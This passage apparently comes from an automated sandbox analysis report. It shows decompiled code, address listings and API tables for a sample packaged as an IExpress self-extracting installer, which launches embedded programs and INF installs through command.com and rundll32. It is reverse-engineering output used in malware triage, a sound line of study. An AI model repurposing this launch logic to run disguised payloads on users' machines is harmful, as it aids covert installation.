                                                                                                                                                                                                                                            								_v304 = 1;
                                                                                                                                                                                                                                            								L11:
                                                                                                                                                                                                                                            								_v300 = 0;
                                                                                                                                                                                                                                            								L14:
                                                                                                                                                                                                                                            								if(_t127 != 0) {
                                                                                                                                                                                                                                            									L27:
                                                                                                                                                                                                                                            									_t155 = 1;
                                                                                                                                                                                                                                            									__eflags = _t127 - 1;
                                                                                                                                                                                                                                            									if(_t127 != 1) {
                                                                                                                                                                                                                                            										L31:
                                                                                                                                                                                                                                            										_t132 =  &_v280;
                                                                                                                                                                                                                                            										_t76 = E00A91AE8( &_v280,  &_v408,  &_v404); // executed
                                                                                                                                                                                                                                            										__eflags = _t76;
                                                                                                                                                                                                                                            										if(_t76 == 0) {
                                                                                                                                                                                                                                            											L62:
                                                                                                                                                                                                                                            											_t77 = 0;
                                                                                                                                                                                                                                            											L63:
                                                                                                                                                                                                                                            											_pop(_t150);
                                                                                                                                                                                                                                            											_pop(_t156);
                                                                                                                                                                                                                                            											_pop(_t128);
                                                                                                                                                                                                                                            											return E00A96CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t157 = _v404;
                                                                                                                                                                                                                                            										__eflags = _t149;
                                                                                                                                                                                                                                            										if(_t149 != 0) {
                                                                                                                                                                                                                                            											L37:
                                                                                                                                                                                                                                            											__eflags = _t157;
                                                                                                                                                                                                                                            											if(_t157 == 0) {
                                                                                                                                                                                                                                            												L57:
                                                                                                                                                                                                                                            												_t151 = _v408;
                                                                                                                                                                                                                                            												_t146 =  &_v352;
                                                                                                                                                                                                                                            												_t130 = _t151; // executed
                                                                                                                                                                                                                                            												_t79 = E00A93FEF(_t130,  &_v352); // executed
                                                                                                                                                                                                                                            												__eflags = _t79;
                                                                                                                                                                                                                                            												if(_t79 == 0) {
                                                                                                                                                                                                                                            													L61:
                                                                                                                                                                                                                                            													LocalFree(_t151);
                                                                                                                                                                                                                                            													goto L62;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												L58:
                                                                                                                                                                                                                                            												LocalFree(_t151);
                                                                                                                                                                                                                                            												_t127 = _t127 + 1;
                                                                                                                                                                                                                                            												_v396 = _t127;
                                                                                                                                                                                                                                            												__eflags = _t127 - 2;
                                                                                                                                                                                                                                            												if(_t127 >= 2) {
                                                                                                                                                                                                                                            													_t155 = 1;
                                                                                                                                                                                                                                            													__eflags = 1;
                                                                                                                                                                                                                                            													L69:
                                                                                                                                                                                                                                            													__eflags =  *0xa98580;
                                                                                                                                                                                                                                            													if( *0xa98580 != 0) {
                                                                                                                                                                                                                                            														E00A92267();
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            													_t77 = _t155;
                                                                                                                                                                                                                                            													goto L63;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												_t153 = _v392;
                                                                                                                                                                                                                                            												_t149 = _v388;
                                                                                                                                                                                                                                            												continue;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											L38:
                                                                                                                                                                                                                                            											__eflags =  *0xa98180;
                                                                                                                                                                                                                                            											if( *0xa98180 == 0) {
                                                                                                                                                                                                                                            												_t146 = 0x4c7;
                                                                                                                                                                                                                                            												E00A944B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            												LocalFree(_v424);
                                                                                                                                                                                                                                            												 *0xa99124 = 0x8007042b;
                                                                                                                                                                                                                                            												goto L62;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags = _t157;
                                                                                                                                                                                                                                            											if(_t157 == 0) {
                                                                                                                                                                                                                                            												goto L57;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags =  *0xa99a34 & 0x00000004;
                                                                                                                                                                                                                                            											if(__eflags == 0) {
                                                                                                                                                                                                                                            												goto L57;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t129 = E00A96495(_t127, _t132, _t157, __eflags);
                                                                                                                                                                                                                                            											__eflags = _t129;
                                                                                                                                                                                                                                            											if(_t129 == 0) {
                                                                                                                                                                                                                                            												_t146 = 0x4c8;
                                                                                                                                                                                                                                            												E00A944B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                                                                                                                                                                                            												L65:
                                                                                                                                                                                                                                            												LocalFree(_v408);
                                                                                                                                                                                                                                            												 *0xa99124 = E00A96285();
                                                                                                                                                                                                                                            												goto L62;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                                                                                                                                                                                            											_v404 = _t146;
                                                                                                                                                                                                                                            											__eflags = _t146;
                                                                                                                                                                                                                                            											if(_t146 == 0) {
                                                                                                                                                                                                                                            												_t146 = 0x4c9;
                                                                                                                                                                                                                                            												__eflags = 0;
                                                                                                                                                                                                                                            												E00A944B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                                                                                                                                                                                            												FreeLibrary(_t129);
                                                                                                                                                                                                                                            												goto L65;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags =  *0xa98a30;
                                                                                                                                                                                                                                            											_t151 = _v408;
                                                                                                                                                                                                                                            											_v384 = 0;
                                                                                                                                                                                                                                            											_v368 =  &_v280;
                                                                                                                                                                                                                                            											_t96 =  *0xa99a40; // 0x3
                                                                                                                                                                                                                                            											_v364 = _t96;
                                                                                                                                                                                                                                            											_t97 =  *0xa98a38 & 0x0000ffff;
                                                                                                                                                                                                                                            											_v380 = 0xa99154;
                                                                                                                                                                                                                                            											_v376 = _t151;
                                                                                                                                                                                                                                            											_v372 = 0xa991e4;
                                                                                                                                                                                                                                            											_v360 = _t97;
                                                                                                                                                                                                                                            											if( *0xa98a30 != 0) {
                                                                                                                                                                                                                                            												_t97 = _t97 | 0x00010000;
                                                                                                                                                                                                                                            												__eflags = _t97;
                                                                                                                                                                                                                                            												_v360 = _t97;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t144 =  *0xa99a34; // 0x1
                                                                                                                                                                                                                                            											__eflags = _t144 & 0x00000008;
                                                                                                                                                                                                                                            											if((_t144 & 0x00000008) != 0) {
                                                                                                                                                                                                                                            												_t97 = _t97 | 0x00020000;
                                                                                                                                                                                                                                            												__eflags = _t97;
                                                                                                                                                                                                                                            												_v360 = _t97;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags = _t144 & 0x00000010;
                                                                                                                                                                                                                                            											if((_t144 & 0x00000010) != 0) {
                                                                                                                                                                                                                                            												_t97 = _t97 | 0x00040000;
                                                                                                                                                                                                                                            												__eflags = _t97;
                                                                                                                                                                                                                                            												_v360 = _t97;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t145 =  *0xa98d48; // 0x0
                                                                                                                                                                                                                                            											__eflags = _t145 & 0x00000040;
                                                                                                                                                                                                                                            											if((_t145 & 0x00000040) != 0) {
                                                                                                                                                                                                                                            												_t97 = _t97 | 0x00080000;
                                                                                                                                                                                                                                            												__eflags = _t97;
                                                                                                                                                                                                                                            												_v360 = _t97;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags = _t145;
                                                                                                                                                                                                                                            											if(_t145 < 0) {
                                                                                                                                                                                                                                            												_t104 = _t97 | 0x00100000;
                                                                                                                                                                                                                                            												__eflags = _t104;
                                                                                                                                                                                                                                            												_v360 = _t104;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t98 =  *0xa99a38; // 0x0
                                                                                                                                                                                                                                            											_v356 = _t98;
                                                                                                                                                                                                                                            											_t130 = _t146;
                                                                                                                                                                                                                                            											 *0xa9a288( &_v384);
                                                                                                                                                                                                                                            											_t101 = _v404();
                                                                                                                                                                                                                                            											__eflags = _t164 - _t164;
                                                                                                                                                                                                                                            											if(_t164 != _t164) {
                                                                                                                                                                                                                                            												_t130 = 4;
                                                                                                                                                                                                                                            												asm("int 0x29");
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											 *0xa99124 = _t101;
                                                                                                                                                                                                                                            											_push(_t129);
                                                                                                                                                                                                                                            											__eflags = _t101;
                                                                                                                                                                                                                                            											if(_t101 < 0) {
                                                                                                                                                                                                                                            												FreeLibrary();
                                                                                                                                                                                                                                            												goto L61;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												FreeLibrary();
                                                                                                                                                                                                                                            												_t127 = _v400;
                                                                                                                                                                                                                                            												goto L58;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags =  *0xa99a40 - 1; // 0x3
                                                                                                                                                                                                                                            										if(__eflags == 0) {
                                                                                                                                                                                                                                            											goto L37;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags =  *0xa98a20;
                                                                                                                                                                                                                                            										if( *0xa98a20 == 0) {
                                                                                                                                                                                                                                            											goto L37;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags = _t157;
                                                                                                                                                                                                                                            										if(_t157 != 0) {
                                                                                                                                                                                                                                            											goto L38;
										}
										_v388 = 1;
										E00A9202A(_t146); // executed
										goto L37;
									}
									_t146 =  &_v280;
									_t108 = E00A9468F("POSTRUNPROGRAM",  &_v280, 0x104);
									__eflags = _t108;
									if(_t108 == 0) {
										goto L25;
									}
									__eflags =  *0xa98c42;
									if( *0xa98c42 != 0) {
										goto L69;
									}
									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
									__eflags = _t112 == 0;
									if(_t112 == 0) {
										goto L69;
									}
									goto L31;
								}
								_t118 =  *0xa98a38; // 0x0
								if(_t118 == 0) {
									L23:
									if(_t153 != 0) {
										goto L31;
									}
									_t146 =  &_v276;
									if(E00A9468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
										goto L27;
									}
									goto L25;
								}
								if((_t118 & 0x00000001) == 0) {
									__eflags = _t118 & 0x00000002;
									if((_t118 & 0x00000002) == 0) {
										goto L62;
									}
									_t140 = "USRQCMD";
									L20:
									_t146 =  &_v276;
									if(E00A9468F(_t140,  &_v276, 0x104) == 0) {
										goto L25;
									}
									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
										_t153 = 1;
										_v388 = 1;
									}
									goto L23;
								}
								_t140 = "ADMQCMD";
								goto L20;
							}
						}
						L26:
						_push(_t130);
						_t146 = 0x104;
						E00A91781( &_v276, 0x104, _t130, 0xa98c42);
						goto L27;
					}
				}
				_t130 = "REBOOT";
				_t125 = E00A9468F(_t130, 0xa99a2c, 4);
				if(_t125 == 0 || _t125 > 4) {
					goto L25;
				} else {
					goto L3;
				}
			}
                                                                                                                                                                                                                                            0x00a93f0b
                                                                                                                                                                                                                                            0x00a93f0b
                                                                                                                                                                                                                                            0x00a93f0f
                                                                                                                                                                                                                                            0x00a93f13
                                                                                                                                                                                                                                            0x00a93f15
                                                                                                                                                                                                                                            0x00a93f1a
                                                                                                                                                                                                                                            0x00a93f1c
                                                                                                                                                                                                                                            0x00a93f46
                                                                                                                                                                                                                                            0x00a93f47
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93f47
                                                                                                                                                                                                                                            0x00a93f1e
                                                                                                                                                                                                                                            0x00a93f1f
                                                                                                                                                                                                                                            0x00a93f25
                                                                                                                                                                                                                                            0x00a93f26
                                                                                                                                                                                                                                            0x00a93f2a
                                                                                                                                                                                                                                            0x00a93f2d
                                                                                                                                                                                                                                            0x00a93fd9
                                                                                                                                                                                                                                            0x00a93fd9
                                                                                                                                                                                                                                            0x00a93fda
                                                                                                                                                                                                                                            0x00a93fda
                                                                                                                                                                                                                                            0x00a93fe1
                                                                                                                                                                                                                                            0x00a93fe3
                                                                                                                                                                                                                                            0x00a93fe3
                                                                                                                                                                                                                                            0x00a93fe8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93fe8
                                                                                                                                                                                                                                            0x00a93f33
                                                                                                                                                                                                                                            0x00a93f37
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93f37
                                                                                                                                                                                                                                            0x00a93dee
                                                                                                                                                                                                                                            0x00a93dee
                                                                                                                                                                                                                                            0x00a93df5
                                                                                                                                                                                                                                            0x00a93fad
                                                                                                                                                                                                                                            0x00a93fb9
                                                                                                                                                                                                                                            0x00a93fc2
                                                                                                                                                                                                                                            0x00a93fc8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93fc8
                                                                                                                                                                                                                                            0x00a93dfb
                                                                                                                                                                                                                                            0x00a93dfd
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93e03
                                                                                                                                                                                                                                            0x00a93e0a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93e15
                                                                                                                                                                                                                                            0x00a93e17
                                                                                                                                                                                                                                            0x00a93e19
                                                                                                                                                                                                                                            0x00a93f94
                                                                                                                                                                                                                                            0x00a93fa4
                                                                                                                                                                                                                                            0x00a93f7c
                                                                                                                                                                                                                                            0x00a93f80
                                                                                                                                                                                                                                            0x00a93f8b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93f8b
                                                                                                                                                                                                                                            0x00a93e2c
                                                                                                                                                                                                                                            0x00a93e30
                                                                                                                                                                                                                                            0x00a93e34
                                                                                                                                                                                                                                            0x00a93e36
                                                                                                                                                                                                                                            0x00a93f69
                                                                                                                                                                                                                                            0x00a93f6e
                                                                                                                                                                                                                                            0x00a93f70
                                                                                                                                                                                                                                            0x00a93f76
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93f76
                                                                                                                                                                                                                                            0x00a93e3c
                                                                                                                                                                                                                                            0x00a93e43
                                                                                                                                                                                                                                            0x00a93e47
                                                                                                                                                                                                                                            0x00a93e52
                                                                                                                                                                                                                                            0x00a93e56
                                                                                                                                                                                                                                            0x00a93e5c
                                                                                                                                                                                                                                            0x00a93e61
                                                                                                                                                                                                                                            0x00a93e68
                                                                                                                                                                                                                                            0x00a93e70
                                                                                                                                                                                                                                            0x00a93e74
                                                                                                                                                                                                                                            0x00a93e7c
                                                                                                                                                                                                                                            0x00a93e80
                                                                                                                                                                                                                                            0x00a93e82
                                                                                                                                                                                                                                            0x00a93e82
                                                                                                                                                                                                                                            0x00a93e87
                                                                                                                                                                                                                                            0x00a93e87
                                                                                                                                                                                                                                            0x00a93e8b
                                                                                                                                                                                                                                            0x00a93e91
                                                                                                                                                                                                                                            0x00a93e94
                                                                                                                                                                                                                                            0x00a93e96
                                                                                                                                                                                                                                            0x00a93e96
                                                                                                                                                                                                                                            0x00a93e9b
                                                                                                                                                                                                                                            0x00a93e9b
                                                                                                                                                                                                                                            0x00a93e9f
                                                                                                                                                                                                                                            0x00a93ea2
                                                                                                                                                                                                                                            0x00a93ea4
                                                                                                                                                                                                                                            0x00a93ea4
                                                                                                                                                                                                                                            0x00a93ea9
                                                                                                                                                                                                                                            0x00a93ea9
                                                                                                                                                                                                                                            0x00a93ead
                                                                                                                                                                                                                                            0x00a93eb3
                                                                                                                                                                                                                                            0x00a93eb6
                                                                                                                                                                                                                                            0x00a93eb8
                                                                                                                                                                                                                                            0x00a93eb8
                                                                                                                                                                                                                                            0x00a93ebd
                                                                                                                                                                                                                                            0x00a93ebd
                                                                                                                                                                                                                                            0x00a93ec1
                                                                                                                                                                                                                                            0x00a93ec3
                                                                                                                                                                                                                                            0x00a93ec5
                                                                                                                                                                                                                                            0x00a93ec5
                                                                                                                                                                                                                                            0x00a93eca
                                                                                                                                                                                                                                            0x00a93eca
                                                                                                                                                                                                                                            0x00a93ece
                                                                                                                                                                                                                                            0x00a93ed5

APIs
• memset.MSVCRT ref: 00A93C11
• CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00A93CDC
  • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946A0
  • Part of subcall function 00A9468F: SizeofResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946A9
  • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946C3
  • Part of subcall function 00A9468F: LoadResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946CC
  • Part of subcall function 00A9468F: LockResource.KERNEL32(00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946D3
  • Part of subcall function 00A9468F: memcpy_s.MSVCRT ref: 00A946E5
  • Part of subcall function 00A9468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946EF
• CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00A98C42), ref: 00A93D8F
• GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00A93E26
• FreeLibrary.KERNEL32(00000000,?,00A98C42), ref: 00A93EFF
• LocalFree.KERNEL32(?,?,?,?,00A98C42), ref: 00A93F1F
• FreeLibrary.KERNEL32(00000000,?,00A98C42), ref: 00A93F40
• LocalFree.KERNEL32(?,?,?,?,00A98C42), ref: 00A93F47
• FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00A98C42), ref: 00A93F76
• LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00A98C42), ref: 00A93F80
• LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00A98C42), ref: 00A93FC2
Strings
Memory Dump Source
• Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
• Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
Similarity
• API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
• String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lenta
• API String ID: 1032054927-2479693719
• Opcode ID: 0b7950036a3a1b10cae858770af1021c59dc079d1b4f4470084e93838ffe0895
• Instruction ID: 329ec58fd67d68a3b081f72a266c866de9e183536ea3b6be266e8ce3fe89edf3
• Opcode Fuzzy Hash: 0b7950036a3a1b10cae858770af1021c59dc079d1b4f4470084e93838ffe0895
• Instruction Fuzzy Hash: E2B1F472708301ABDF20DF688949B6B77F4EB89740F10092EFA95DA190DB74CD46CB96
Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                            			E00A91AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				char _v527;
                                                                                                                                                                                                                                            				char _v528;
                                                                                                                                                                                                                                            				char _v1552;
                                                                                                                                                                                                                                            				CHAR* _v1556;
                                                                                                                                                                                                                                            				int* _v1560;
                                                                                                                                                                                                                                            				CHAR** _v1564;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t48;
                                                                                                                                                                                                                                            				CHAR* _t53;
                                                                                                                                                                                                                                            				CHAR* _t54;
                                                                                                                                                                                                                                            				char* _t57;
                                                                                                                                                                                                                                            				char* _t58;
                                                                                                                                                                                                                                            				CHAR* _t60;
                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                            				signed char _t65;
                                                                                                                                                                                                                                            				intOrPtr _t76;
                                                                                                                                                                                                                                            				intOrPtr _t77;
                                                                                                                                                                                                                                            				unsigned int _t85;
                                                                                                                                                                                                                                            				CHAR* _t90;
                                                                                                                                                                                                                                            				CHAR* _t92;
                                                                                                                                                                                                                                            				char _t105;
                                                                                                                                                                                                                                            				char _t106;
                                                                                                                                                                                                                                            				CHAR** _t111;
                                                                                                                                                                                                                                            				CHAR* _t115;
                                                                                                                                                                                                                                            				intOrPtr* _t125;
                                                                                                                                                                                                                                            				void* _t126;
                                                                                                                                                                                                                                            				CHAR* _t132;
                                                                                                                                                                                                                                            				CHAR* _t135;
                                                                                                                                                                                                                                            				void* _t138;
                                                                                                                                                                                                                                            				void* _t139;
                                                                                                                                                                                                                                            				void* _t145;
                                                                                                                                                                                                                                            				intOrPtr* _t146;
                                                                                                                                                                                                                                            				char* _t148;
                                                                                                                                                                                                                                            				CHAR* _t151;
                                                                                                                                                                                                                                            				void* _t152;
                                                                                                                                                                                                                                            				CHAR* _t155;
                                                                                                                                                                                                                                            				CHAR* _t156;
                                                                                                                                                                                                                                            				void* _t157;
                                                                                                                                                                                                                                            				signed int _t158;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t48 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t48 ^ _t158;
                                                                                                                                                                                                                                            				_t108 = __ecx;
                                                                                                                                                                                                                                            				_v1564 = _a4;
                                                                                                                                                                                                                                            				_v1560 = _a8;
                                                                                                                                                                                                                                            				E00A91680( &_v528, 0x104, __ecx);
                                                                                                                                                                                                                                            				if(_v528 != 0x22) {
                                                                                                                                                                                                                                            					_t135 = " ";
                                                                                                                                                                                                                                            					_t53 =  &_v528;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t135 = "\"";
                                                                                                                                                                                                                                            					_t53 =  &_v527;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t111 =  &_v1556;
                                                                                                                                                                                                                                            				_v1556 = _t53;
                                                                                                                                                                                                                                            				_t54 = E00A91A84(_t111, _t135);
                                                                                                                                                                                                                                            				_t156 = _v1556;
                                                                                                                                                                                                                                            				_t151 = _t54;
                                                                                                                                                                                                                                            				if(_t156 == 0) {
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					_push(_t111);
                                                                                                                                                                                                                                            					E00A91781( &_v268, 0x104, _t111, "C:\Users\jones\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                                                            					E00A9658A( &_v268, 0x104, _t156);
                                                                                                                                                                                                                                            					goto L13;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t132 = _t156;
                                                                                                                                                                                                                                            					_t148 =  &(_t132[1]);
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						_t105 =  *_t132;
                                                                                                                                                                                                                                            						_t132 =  &(_t132[1]);
                                                                                                                                                                                                                                            					} while (_t105 != 0);
                                                                                                                                                                                                                                            					_t111 = _t132 - _t148;
                                                                                                                                                                                                                                            					if(_t111 < 3) {
                                                                                                                                                                                                                                            						goto L12;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t106 = _t156[1];
                                                                                                                                                                                                                                            					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                                                                                                                                                                                            						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                                                                                                                                                                                            							goto L12;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							goto L11;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                                            						E00A91680( &_v268, 0x104, _t156);
                                                                                                                                                                                                                                            						L13:
                                                                                                                                                                                                                                            						_t138 = 0x2e;
                                                                                                                                                                                                                                            						_t57 = E00A966C8(_t156, _t138);
                                                                                                                                                                                                                                            						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E00A966C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E00A91680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E00A91781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E00A916B3( &_v1552, 0x400, " ");
										E00A916B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E00A92AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E00A9171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E00A91A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E00A91A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E00A944B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
										_t92 = "DefaultInstall";
									}
									 *0xa99120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
									 *_v1560 = 1;
									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xa91140, _t156, 8,  &_v268) == 0) {
										 *0xa99a34 =  *0xa99a34 & 0xfffffffb;
										if( *0xa99a40 != 0) {
											_t108 = "setupapi.dll";
										} else {
											_t108 = "setupx.dll";
											GetShortPathNameA( &_v268,  &_v268, 0x104);
										}
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										_push( &_v268);
										_push(_t155);
										E00A9171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
									} else {
										 *0xa99a34 =  *0xa99a34 | 0x00000004;
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										E00A91680(_t108, 0x104, _t155);
										_t140 = 0x200;
										E00A91680(_t156, 0x200,  &_v268);
									}
									L53:
									_t62 = 1;
									 *_v1564 = _t156;
									L54:
									_pop(_t152);
									return E00A96CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
								}
							}
						}
					}
				}
			}
                                                                                                                                                                                                                                            0x00a91b52
                                                                                                                                                                                                                                            0x00a91b57
                                                                                                                                                                                                                                            0x00a91b5d
                                                                                                                                                                                                                                            0x00a91b61
                                                                                                                                                                                                                                            0x00a91b9f
                                                                                                                                                                                                                                            0x00a91b9f
                                                                                                                                                                                                                                            0x00a91bb1
                                                                                                                                                                                                                                            0x00a91bc2
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a91b63
                                                                                                                                                                                                                                            0x00a91b63
                                                                                                                                                                                                                                            0x00a91b65
                                                                                                                                                                                                                                            0x00a91b68
                                                                                                                                                                                                                                            0x00a91b68
                                                                                                                                                                                                                                            0x00a91b6a
                                                                                                                                                                                                                                            0x00a91b6b
                                                                                                                                                                                                                                            0x00a91b6f
                                                                                                                                                                                                                                            0x00a91b74
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a91b76
                                                                                                                                                                                                                                            0x00a91b7b
                                                                                                                                                                                                                                            0x00a91b86
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a91b8c
                                                                                                                                                                                                                                            0x00a91b8c
                                                                                                                                                                                                                                            0x00a91b98
                                                                                                                                                                                                                                            0x00a91bc7
                                                                                                                                                                                                                                            0x00a91bc9
                                                                                                                                                                                                                                            0x00a91bcc
                                                                                                                                                                                                                                            0x00a91bd3
                                                                                                                                                                                                                                            0x00a91d75
                                                                                                                                                                                                                                            0x00a91d76
                                                                                                                                                                                                                                            0x00a91d78
